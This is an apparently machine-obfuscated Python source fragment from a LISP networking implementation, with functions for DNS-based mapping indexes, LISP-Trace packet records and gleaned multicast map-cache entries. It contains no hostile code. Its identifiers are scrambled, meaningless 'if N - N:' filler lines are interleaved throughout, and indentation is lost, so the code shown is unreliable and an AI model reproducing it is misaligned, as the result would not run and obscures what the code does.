if 55 - 55: OoooooooOO
return
if 26 - 26: OoooooooOO * iII111i - iIii1I11I1II1 + I1ii11iIi11i
if 37 - 37: iII111i - OoooooooOO . i11iIiiIii * i1IIi - II111iiii * ooOoO0o
if 54 - 54: OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
if 41 - 41: oO0o . II111iiii
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
def lisp_decent_pull_xtr_configured ( ) :
return ( lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None )
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
if 28 - 28: IiII + I11i
if 1 - 1: OoooooooOO - i11iIiiIii . OoooooooOO - o0oOOo0O0Ooo - OOooOOo * I1Ii111
if 56 - 56: Ii1I . OoO0O00
if 43 - 43: iII111i * iII111i
if 31 - 31: O0 - iIii1I11I1II1 . I11i . oO0o
if 96 - 96: OoooooooOO * iIii1I11I1II1 * Oo0Ooo
def lisp_is_decent_dns_suffix ( dns_name ) :
if ( lisp_decent_dns_suffix == None ) : return ( False )
oOo0oooo = dns_name . split ( "." )
oOo0oooo = "." . join ( oOo0oooo [ 1 : : ] )
return ( oOo0oooo == lisp_decent_dns_suffix )
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
if 47 - 47: OOooOOo * oO0o
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
def lisp_get_decent_index ( eid ) :
iiI1Ii1I = eid . print_prefix ( )
oO0oOo = hashlib . sha256 ( iiI1Ii1I ) . hexdigest ( )
OO000o00 = int ( oO0oOo , 16 ) % lisp_decent_modulus
return ( OO000o00 )
if 30 - 30: OoOoOO00 + OoooooooOO - OoOoOO00 / Ii1I - Ii1I / i11iIiiIii
if 48 - 48: iIii1I11I1II1 % OoooooooOO * Ii1I . i1IIi . oO0o % iIii1I11I1II1
if 89 - 89: I11i + I11i * OoooooooOO + IiII % iIii1I11I1II1
if 52 - 52: i1IIi
if 85 - 85: I1Ii111 - iII111i
if 44 - 44: I11i - I11i - IiII . I11i
if 34 - 34: iIii1I11I1II1 - oO0o * i11iIiiIii * o0oOOo0O0Ooo
def lisp_get_decent_dns_name ( eid ) :
OO000o00 = lisp_get_decent_index ( eid )
return ( str ( OO000o00 ) + "." + lisp_decent_dns_suffix )
if 15 - 15: I1Ii111
if 25 - 25: I1ii11iIi11i * O0
if 8 - 8: i11iIiiIii
if 95 - 95: ooOoO0o + i1IIi / OOooOOo . i11iIiiIii
if 31 - 31: iII111i - iII111i - oO0o
if 62 - 62: Oo0Ooo % Oo0Ooo / OoooooooOO * o0oOOo0O0Ooo . Ii1I
if 1 - 1: I1ii11iIi11i / II111iiii / II111iiii + o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
def lisp_get_decent_dns_name_from_str ( iid , eid_str ) :
I111o0oooO00o0 = lisp_address ( LISP_AFI_NONE , eid_str , 0 , iid )
OO000o00 = lisp_get_decent_index ( I111o0oooO00o0 )
return ( str ( OO000o00 ) + "." + lisp_decent_dns_suffix )
if 87 - 87: OOooOOo * OoO0O00
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
if 86 - 86: II111iiii
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
if 40 - 40: Oo0Ooo . II111iiii / II111iiii - i1IIi
if 91 - 91: Ii1I
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
rloc_entry = None ) :
if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o
i1 = 28 if packet . inner_version == 4 else 48
IIii1I11IIII = packet . packet [ i1 : : ]
iIi111I1 = lisp_trace ( )
if ( iIi111I1 . decode ( IIii1I11IIII ) == False ) :
lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
return ( False )
if 16 - 16: ooOoO0o
if 49 - 49: o0oOOo0O0Ooo + o0oOOo0O0Ooo . OOooOOo - OoooooooOO
OO0Oii1I1 = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
if 81 - 81: i11iIiiIii
if 57 - 57: O0
if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
if 4 - 4: I1ii11iIi11i * O0 / OoO0O00 * II111iiii . iIii1I11I1II1 / OOooOOo
if 97 - 97: i1IIi - OoOoOO00 . OoooooooOO
if ( OO0Oii1I1 != "?" and packet . encap_port != LISP_DATA_PORT ) :
if ( ed == "encap" ) : OO0Oii1I1 += ":{}" . format ( packet . encap_port )
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
if 50 - 50: iII111i * O0 % II111iiii
if 80 - 80: OOooOOo - II111iiii - OoO0O00
iIiiiIIiii = { }
iIiiiIIiii [ "node" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
if 62 - 62: Ii1I . i11iIiiIii % OOooOOo
Ii1Ii111I1ii1 = packet . outer_source
if ( Ii1Ii111I1ii1 . is_null ( ) ) : Ii1Ii111I1ii1 = lisp_myrlocs [ 0 ]
iIiiiIIiii [ "srloc" ] = Ii1Ii111I1ii1 . print_address_no_iid ( )
if 59 - 59: I11i - I1IiiI
if 95 - 95: OoOoOO00 + I1IiiI + iII111i
if 15 - 15: Oo0Ooo - I1IiiI % OoO0O00 % iIii1I11I1II1 + O0 - II111iiii
if 96 - 96: OoooooooOO
if 1 - 1: oO0o * II111iiii + i1IIi * oO0o % I1IiiI
if ( iIiiiIIiii [ "node" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
iIiiiIIiii [ "srloc" ] += ":{}" . format ( packet . inner_sport )
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
iIiiiIIiii [ "hn" ] = lisp_hostname
iII1 = ed + "-ts"
iIiiiIIiii [ iII1 ] = lisp_get_timestamp ( )
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
if 79 - 79: IiII + I1Ii111
if 59 - 59: iII111i - oO0o . ooOoO0o / IiII * i11iIiiIii
if 61 - 61: I11i - Oo0Ooo * II111iiii + iIii1I11I1II1
if 37 - 37: OoooooooOO % II111iiii / o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i . iIii1I11I1II1
if 73 - 73: OoOoOO00
if ( OO0Oii1I1 == "?" and iIiiiIIiii [ "node" ] == "ETR" ) :
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( o00o0oOo0o0O != None and len ( o00o0oOo0o0O . rloc_set ) >= 1 ) :
OO0Oii1I1 = o00o0oOo0o0O . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 44 - 44: Oo0Ooo / oO0o
if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
iIiiiIIiii [ "drloc" ] = OO0Oii1I1
if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
if 53 - 53: OOooOOo + i11iIiiIii
if 25 - 25: i11iIiiIii
if 51 - 51: iII111i . ooOoO0o
if ( OO0Oii1I1 == "?" and reason != None ) :
iIiiiIIiii [ "drloc" ] += " ({})" . format ( reason )
if 70 - 70: I11i / O0 - I11i + o0oOOo0O0Ooo . ooOoO0o . o0oOOo0O0Ooo
if 6 - 6: I11i + II111iiii - I1Ii111
if 45 - 45: i1IIi / iII111i + i11iIiiIii * I11i + ooOoO0o / OoooooooOO
if 56 - 56: I11i + I1Ii111
if 80 - 80: II111iiii . Ii1I + o0oOOo0O0Ooo / II111iiii / OoO0O00 + iIii1I11I1II1
if ( rloc_entry != None ) :
iIiiiIIiii [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
iIiiiIIiii [ "hops" ] = rloc_entry . recent_rloc_probe_hops
if 29 - 29: o0oOOo0O0Ooo + OoOoOO00 + ooOoO0o - I1ii11iIi11i
if 64 - 64: O0 / OoooooooOO
if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00
Oooo0OOO0oo0o = packet . inner_source . print_address ( )
OOOoOO0o00o0o = packet . inner_dest . print_address ( )
if ( iIi111I1 . packet_json == [ ] ) :
O00oOO = { }
O00oOO [ "seid" ] = Oooo0OOO0oo0o
O00oOO [ "deid" ] = OOOoOO0o00o0o
O00oOO [ "paths" ] = [ ]
iIi111I1 . packet_json . append ( O00oOO )
if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
if 77 - 77: OoO0O00
if 95 - 95: II111iiii
if 59 - 59: iIii1I11I1II1 % OOooOOo / OoOoOO00 * I1Ii111 * OoooooooOO * O0
for O00oOO in iIi111I1 . packet_json :
if ( O00oOO [ "deid" ] != OOOoOO0o00o0o ) : continue
O00oOO [ "paths" ] . append ( iIiiiIIiii )
break
if 43 - 43: OoO0O00 * I1IiiI * OOooOOo * O0 - O0 / o0oOOo0O0Ooo
if 77 - 77: I11i % I1Ii111 . IiII % OoooooooOO * o0oOOo0O0Ooo
if 87 - 87: iII111i + IiII / ooOoO0o * ooOoO0o * OOooOOo
if 97 - 97: I1Ii111
if 47 - 47: iII111i / I1ii11iIi11i - Ii1I . II111iiii
if 56 - 56: O0 - i1IIi % o0oOOo0O0Ooo + IiII
if 42 - 42: o0oOOo0O0Ooo . OOooOOo % I11i - OoOoOO00
if 38 - 38: OoooooooOO
Ii1Ii1I = False
if ( len ( iIi111I1 . packet_json ) == 1 and iIiiiIIiii [ "node" ] == "ETR" and
iIi111I1 . myeid ( packet . inner_dest ) ) :
O00oOO = { }
O00oOO [ "seid" ] = OOOoOO0o00o0o
O00oOO [ "deid" ] = Oooo0OOO0oo0o
O00oOO [ "paths" ] = [ ]
iIi111I1 . packet_json . append ( O00oOO )
Ii1Ii1I = True
if 21 - 21: OoOoOO00 + IiII / I1IiiI
if 29 - 29: ooOoO0o / iIii1I11I1II1 - I1IiiI
if 93 - 93: OOooOOo
if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
if 37 - 37: O0 + IiII + I1IiiI
iIi111I1 . print_trace ( )
IIii1I11IIII = iIi111I1 . encode ( )
if 50 - 50: OoooooooOO . I1Ii111
if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
if 13 - 13: iII111i . I11i * OoO0O00 . i1IIi . iIii1I11I1II1 - o0oOOo0O0Ooo
if 68 - 68: Ii1I % o0oOOo0O0Ooo / OoooooooOO + Ii1I - Ii1I
if 79 - 79: II111iiii / IiII
if 4 - 4: O0 - i11iIiiIii % ooOoO0o * O0 - ooOoO0o
if 96 - 96: oO0o % II111iiii . Ii1I % OoO0O00 . iIii1I11I1II1 / IiII
if 96 - 96: o0oOOo0O0Ooo / O0 . iIii1I11I1II1 . Ii1I % OOooOOo % II111iiii
Ii11i = iIi111I1 . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "srloc" ]
if ( OO0Oii1I1 == "?" ) :
lprint ( "LISP-Trace return to sender RLOC {}" . format ( Ii11i ) )
iIi111I1 . return_to_sender ( lisp_socket , Ii11i , IIii1I11IIII )
return ( False )
if 93 - 93: I1Ii111 / o0oOOo0O0Ooo
if 33 - 33: OOooOOo * IiII * OoO0O00 - I1ii11iIi11i % OoO0O00
if 16 - 16: OoO0O00 * I1IiiI
if 58 - 58: oO0o * II111iiii * O0
if 89 - 89: I1Ii111 + IiII % I1ii11iIi11i
if 80 - 80: Oo0Ooo + ooOoO0o + IiII
ii1I = iIi111I1 . packet_length ( )
if 76 - 76: I1Ii111
if 23 - 23: O0 % I1ii11iIi11i % iIii1I11I1II1
if 49 - 49: iII111i + I1Ii111 % OoOoOO00
if 67 - 67: Ii1I
if 27 - 27: Oo0Ooo / i11iIiiIii / II111iiii . Ii1I - II111iiii / OoO0O00
if 61 - 61: ooOoO0o - OOooOOo
iiIo0OoOO = packet . packet [ 0 : i1 ]
iIiiI11II11 = struct . pack ( "HH" , socket . htons ( ii1I ) , 0 )
iiIo0OoOO = iiIo0OoOO [ 0 : i1 - 4 ] + iIiiI11II11
if ( packet . inner_version == 6 and iIiiiIIiii [ "node" ] == "ETR" and
len ( iIi111I1 . packet_json ) == 2 ) :
O0OO0ooO00 = iiIo0OoOO [ i1 - 8 : : ] + IIii1I11IIII
O0OO0ooO00 = lisp_udp_checksum ( Oooo0OOO0oo0o , OOOoOO0o00o0o , O0OO0ooO00 )
iiIo0OoOO = iiIo0OoOO [ 0 : i1 - 8 ] + O0OO0ooO00 [ 0 : 8 ]
if 90 - 90: oO0o + iIii1I11I1II1 % i1IIi - OoooooooOO . Ii1I
if 91 - 91: iII111i - i11iIiiIii
if 27 - 27: iII111i
if 66 - 66: O0 . iIii1I11I1II1 * II111iiii * OOooOOo * IiII
if 44 - 44: i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo + I1ii11iIi11i + Ii1I
if 43 - 43: i1IIi . iIii1I11I1II1
if ( Ii1Ii1I ) :
if ( packet . inner_version == 4 ) :
iiIo0OoOO = iiIo0OoOO [ 0 : 12 ] + iiIo0OoOO [ 16 : 20 ] + iiIo0OoOO [ 12 : 16 ] + iiIo0OoOO [ 22 : 24 ] + iiIo0OoOO [ 20 : 22 ] + iiIo0OoOO [ 24 : : ]
if 86 - 86: OOooOOo + OoOoOO00 - OoO0O00 + i1IIi + iIii1I11I1II1
else :
iiIo0OoOO = iiIo0OoOO [ 0 : 8 ] + iiIo0OoOO [ 24 : 40 ] + iiIo0OoOO [ 8 : 24 ] + iiIo0OoOO [ 42 : 44 ] + iiIo0OoOO [ 40 : 42 ] + iiIo0OoOO [ 44 : : ]
if 68 - 68: OoOoOO00 . I1IiiI + ooOoO0o - o0oOOo0O0Ooo
if 62 - 62: Ii1I - OOooOOo
Ii = packet . inner_dest
packet . inner_dest = packet . inner_source
packet . inner_source = Ii
if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
if 68 - 68: I1Ii111 - OoO0O00 % Ii1I + i1IIi . ooOoO0o
if 36 - 36: oO0o * iIii1I11I1II1 - O0 - IiII * O0 + i11iIiiIii
if 76 - 76: OoO0O00 % O0 / Ii1I + I1IiiI
i1 = 2 if packet . inner_version == 4 else 4
iii1IiiII1i = 20 + ii1I if packet . inner_version == 4 else ii1I
I1IIIIiiii = struct . pack ( "H" , socket . htons ( iii1IiiII1i ) )
iiIo0OoOO = iiIo0OoOO [ 0 : i1 ] + I1IIIIiiii + iiIo0OoOO [ i1 + 2 : : ]
if 13 - 13: II111iiii / iIii1I11I1II1
if 82 - 82: o0oOOo0O0Ooo / ooOoO0o . I1IiiI + ooOoO0o
if 71 - 71: oO0o + ooOoO0o
if 87 - 87: ooOoO0o % oO0o
if ( packet . inner_version == 4 ) :
ii1i1 = struct . pack ( "H" , 0 )
iiIo0OoOO = iiIo0OoOO [ 0 : 10 ] + ii1i1 + iiIo0OoOO [ 12 : : ]
I1IIIIiiii = lisp_ip_checksum ( iiIo0OoOO [ 0 : 20 ] )
iiIo0OoOO = I1IIIIiiii + iiIo0OoOO [ 20 : : ]
if 45 - 45: oO0o
if 95 - 95: iII111i * iIii1I11I1II1 . i1IIi
if 43 - 43: oO0o * ooOoO0o - I11i
if 70 - 70: oO0o / Ii1I
if 15 - 15: iIii1I11I1II1 % ooOoO0o % i11iIiiIii
packet . packet = iiIo0OoOO + IIii1I11IIII
return ( True )
if 16 - 16: iII111i
if 50 - 50: iIii1I11I1II1 - II111iiii % i1IIi
if 48 - 48: O0
if 60 - 60: ooOoO0o - IiII % i1IIi
if 5 - 5: oO0o
if 29 - 29: i1IIi . OoOoOO00 . i1IIi + oO0o . I1Ii111 + O0
if 62 - 62: I1ii11iIi11i . IiII + OoO0O00 - OoOoOO00 * O0 + I1Ii111
if 58 - 58: oO0o . OoO0O00 / ooOoO0o
if 61 - 61: I11i + I1Ii111
if 27 - 27: ooOoO0o / i1IIi . oO0o - OoooooooOO
def lisp_allow_gleaning ( eid , group , rloc ) :
if ( lisp_glean_mappings == [ ] ) : return ( False , False , False )
if 48 - 48: ooOoO0o % ooOoO0o / OoooooooOO + i1IIi * oO0o + ooOoO0o
for iIiiiIIiii in lisp_glean_mappings :
if ( iIiiiIIiii . has_key ( "instance-id" ) ) :
oOo00Ooo0o0 = eid . instance_id
iI111 , OoO0 = iIiiiIIiii [ "instance-id" ]
if ( oOo00Ooo0o0 < iI111 or oOo00Ooo0o0 > OoO0 ) : continue
if 69 - 69: iII111i . iII111i
if ( iIiiiIIiii . has_key ( "eid-prefix" ) ) :
o0OoO00 = copy . deepcopy ( iIiiiIIiii [ "eid-prefix" ] )
o0OoO00 . instance_id = eid . instance_id
if ( eid . is_more_specific ( o0OoO00 ) == False ) : continue
if 46 - 46: IiII * Oo0Ooo + I1Ii111
if ( iIiiiIIiii . has_key ( "group-prefix" ) ) :
if ( group == None ) : continue
II1IIiIiiI1iI = copy . deepcopy ( iIiiiIIiii [ "group-prefix" ] )
II1IIiIiiI1iI . instance_id = group . instance_id
if ( group . is_more_specific ( II1IIiIiiI1iI ) == False ) : continue
if 79 - 79: IiII
if ( iIiiiIIiii . has_key ( "rloc-prefix" ) ) :
if ( rloc != None and rloc . is_more_specific ( iIiiiIIiii [ "rloc-prefix" ] )
== False ) : continue
if 89 - 89: IiII * I11i + I1ii11iIi11i * oO0o - II111iiii
return ( True , iIiiiIIiii [ "rloc-probe" ] , iIiiiIIiii [ "igmp-query" ] )
if 58 - 58: ooOoO0o . I1Ii111 / i1IIi % I1ii11iIi11i + o0oOOo0O0Ooo
return ( False , False , False )
if 94 - 94: i11iIiiIii + I1Ii111 . iII111i - ooOoO0o % I1Ii111
if 94 - 94: i11iIiiIii - OOooOOo - O0 * OoooooooOO - ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
def lisp_build_gleaned_multicast ( seid , geid , rloc , port , igmp ) :
iiIiII11i1 = geid . print_address ( )
OOO0o0Oo0O0O0O0O = seid . print_address_no_iid ( )
o0 = green ( "{}" . format ( OOO0o0Oo0O0O0O0O ) , False )
o0OoO00 = green ( "(*, {})" . format ( iiIiII11i1 ) , False )
O0OooO0oo = red ( rloc . print_address_no_iid ( ) + ":" + str ( port ) , False )
if 7 - 7: iIii1I11I1II1 * o0oOOo0O0Ooo . oO0o
if 62 - 62: i11iIiiIii + o0oOOo0O0Ooo + I1ii11iIi11i / OOooOOo % OOooOOo
if 99 - 99: I1Ii111 - O0 . I11i - IiII * i1IIi
if 98 - 98: Ii1I / o0oOOo0O0Ooo . I1Ii111 + I1IiiI . i1IIi - I11i
OoOoooooO00oo = lisp_map_cache_lookup ( seid , geid )
if ( OoOoooooO00oo == None ) :
OoOoooooO00oo = lisp_mapping ( "" , "" , [ ] )
OoOoooooO00oo . group . copy_address ( geid )
OoOoooooO00oo . eid . copy_address ( geid )
OoOoooooO00oo . eid . address = 0
OoOoooooO00oo . eid . mask_len = 0
OoOoooooO00oo . mapping_source . copy_address ( rloc )
OoOoooooO00oo . map_cache_ttl = LISP_IGMP_TTL
OoOoooooO00oo . gleaned = True
OoOoooooO00oo . add_cache ( )
lprint ( "Add gleaned EID {} to map-cache" . format ( o0OoO00 ) )
if 92 - 92: ooOoO0o + o0oOOo0O0Ooo . I1ii11iIi11i
if 25 - 25: IiII + i11iIiiIii . O0
if 94 - 94: OoooooooOO + iII111i * OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 / iIii1I11I1II1 / II111iiii
if 93 - 93: oO0o
if 53 - 53: OoO0O00 * i1IIi / Oo0Ooo / OoO0O00 * ooOoO0o
IiIIIi = OoOOOO000Oo = Oo0000O00o0 = None
if ( OoOoooooO00oo . rloc_set != [ ] ) :
IiIIIi = OoOoooooO00oo . rloc_set [ 0 ]
if ( IiIIIi . rle ) :
OoOOOO000Oo = IiIIIi . rle
for IiIii1i11III in OoOOOO000Oo . rle_nodes :
if ( IiIii1i11III . rloc_name != OOO0o0Oo0O0O0O0O ) : continue
Oo0000O00o0 = IiIii1i11III
break
if 49 - 49: iII111i / II111iiii + i11iIiiIii * Oo0Ooo
if 100 - 100: Oo0Ooo * oO0o
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if 85 - 85: OoO0O00 - Ii1I / O0
if ( IiIIIi == None ) :
IiIIIi = lisp_rloc ( )
OoOoooooO00oo . rloc_set = [ IiIIIi ]
IiIIIi . priority = 253
IiIIIi . mpriority = 255
OoOoooooO00oo . build_best_rloc_set ( )
if 45 - 45: IiII + I1Ii111 / I11i
if ( OoOOOO000Oo == None ) :
OoOOOO000Oo = lisp_rle ( geid . print_address ( ) )
IiIIIi . rle = OoOOOO000Oo
if 84 - 84: iII111i % II111iiii
if ( Oo0000O00o0 == None ) :
Oo0000O00o0 = lisp_rle_node ( )
Oo0000O00o0 . rloc_name = OOO0o0Oo0O0O0O0O
OoOOOO000Oo . rle_nodes . append ( Oo0000O00o0 )
OoOOOO000Oo . build_forwarding_list ( )
lprint ( "Add RLE {} from {} for gleaned EID {}" . format ( O0OooO0oo , o0 , o0OoO00 ) )
elif ( rloc . is_exact_match ( Oo0000O00o0 . address ) == False or
port != Oo0000O00o0 . translated_port ) :
lprint ( "Changed RLE {} from {} for gleaned EID {}" . format ( O0OooO0oo , o0 , o0OoO00 ) )
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
if 68 - 68: O0 % oO0o * IiII % O0
if 55 - 55: O0 % I1IiiI % O0
Oo0000O00o0 . store_translated_rloc ( rloc , port )
if 27 - 27: I1IiiI + I1ii11iIi11i * I1Ii111 % Ii1I - Oo0Ooo
if 87 - 87: i11iIiiIii % OOooOOo - OoOoOO00 * ooOoO0o / Oo0Ooo
if 74 - 74: OoooooooOO * ooOoO0o - I11i / I1ii11iIi11i % iIii1I11I1II1
if 94 - 94: Ii1I * I1Ii111 + OoOoOO00 . iIii1I11I1II1
if 44 - 44: Oo0Ooo . Oo0Ooo * Oo0Ooo
if ( igmp ) :
O0ooO0oOoOo = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( O0ooO0oOoOo ) == False ) :
lisp_gleaned_groups [ O0ooO0oOoOo ] = { }
if 23 - 23: I1Ii111 / iII111i . O0 % II111iiii
lisp_gleaned_groups [ O0ooO0oOoOo ] [ iiIiII11i1 ] = lisp_get_timestamp ( )
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
if 90 - 90: II111iiii % I1Ii111 - IiII . Oo0Ooo % OOooOOo - OoOoOO00
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if 65 - 65: ooOoO0o % OOooOOo + OOooOOo % I1Ii111 . I1IiiI % O0
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
if 1 - 1: I1ii11iIi11i % O0 - I1ii11iIi11i / OoooooooOO / OoO0O00
if 82 - 82: i1IIi % Ii1I
if 85 - 85: I1Ii111 * i11iIiiIii * iIii1I11I1II1 % iIii1I11I1II1
def lisp_remove_gleaned_multicast ( seid , geid ) :
if 64 - 64: OoO0O00 / Ii1I
if 79 - 79: Ii1I % OOooOOo
if 39 - 39: I1ii11iIi11i / Ii1I - II111iiii . i1IIi
if 59 - 59: II111iiii
OoOoooooO00oo = lisp_map_cache_lookup ( seid , geid )
if ( OoOoooooO00oo == None ) : return
if 36 - 36: ooOoO0o . II111iiii - OoOoOO00 % I1ii11iIi11i * O0
OoO000oo000o0 = OoOoooooO00oo . rloc_set [ 0 ] . rle
if ( OoO000oo000o0 == None ) : return
if 91 - 91: iII111i + Oo0Ooo / OoooooooOO * iIii1I11I1II1 - OoO0O00
Ooo000oo0OO0 = seid . print_address_no_iid ( )
OO0Oo0Oo = False
for Oo0000O00o0 in OoO000oo000o0 . rle_nodes :
if ( Oo0000O00o0 . rloc_name == Ooo000oo0OO0 ) :
OO0Oo0Oo = True
break
if 73 - 73: iIii1I11I1II1 % I1Ii111 % II111iiii * Oo0Ooo * OoO0O00
if 48 - 48: OOooOOo * i11iIiiIii - i11iIiiIii + iIii1I11I1II1 + I1IiiI % OoooooooOO
if ( OO0Oo0Oo == False ) : return
if 61 - 61: i1IIi
if 56 - 56: iIii1I11I1II1 / I11i * iII111i * I11i * OoooooooOO
if 44 - 44: I1ii11iIi11i - OOooOOo % I11i - I1Ii111 / iIii1I11I1II1 - OOooOOo
if 38 - 38: iIii1I11I1II1 - OoooooooOO * II111iiii . OoooooooOO + OOooOOo
OoO000oo000o0 . rle_nodes . remove ( Oo0000O00o0 )
OoO000oo000o0 . build_forwarding_list ( )
if 59 - 59: OoooooooOO
iiIiII11i1 = geid . print_address ( )
O0ooO0oOoOo = seid . print_address ( )
o0 = green ( "{}" . format ( O0ooO0oOoOo ) , False )
o0OoO00 = green ( "(*, {})" . format ( iiIiII11i1 ) , False )
lprint ( "Gleaned EID {} RLE removed for {}" . format ( o0OoO00 , o0 ) )
if 22 - 22: II111iiii
if 85 - 85: I1Ii111 + I1ii11iIi11i * I11i % o0oOOo0O0Ooo + Ii1I
if 23 - 23: IiII * OoO0O00
if 42 - 42: IiII
if ( lisp_gleaned_groups . has_key ( O0ooO0oOoOo ) ) :
if ( lisp_gleaned_groups [ O0ooO0oOoOo ] . has_key ( iiIiII11i1 ) ) :
lisp_gleaned_groups [ O0ooO0oOoOo ] . pop ( iiIiII11i1 )
if 83 - 83: i1IIi * o0oOOo0O0Ooo / OoO0O00 / o0oOOo0O0Ooo
if 55 - 55: Oo0Ooo % O0 - OoO0O00
if 42 - 42: OoooooooOO * OOooOOo
if 93 - 93: OOooOOo + II111iiii . oO0o * Oo0Ooo - O0 + I1Ii111
if 99 - 99: OoO0O00 * o0oOOo0O0Ooo + OoOoOO00 * iIii1I11I1II1
if 38 - 38: I1ii11iIi11i - OOooOOo * O0 - I1ii11iIi11i
if ( OoO000oo000o0 . rle_nodes == [ ] ) :
OoOoooooO00oo . delete_cache ( )
lprint ( "Gleaned EID {} remove, no more RLEs" . format ( o0OoO00 ) )
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
if 36 - 36: II111iiii % IiII . i11iIiiIii
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
if 92 - 92: I1IiiI % IiII
if 95 - 95: OoooooooOO / OoO0O00 % O0 / I1Ii111 * Ii1I + I1ii11iIi11i
if 7 - 7: ooOoO0o
def lisp_change_gleaned_multicast ( seid , rloc , port ) :
O0ooO0oOoOo = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( O0ooO0oOoOo ) == False ) : return
if 83 - 83: oO0o / I1Ii111 + I1Ii111 * I1ii11iIi11i
for oOoooOOO0o0 in lisp_gleaned_groups [ O0ooO0oOoOo ] :
lisp_geid . store_address ( oOoooOOO0o0 )
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , port , False )
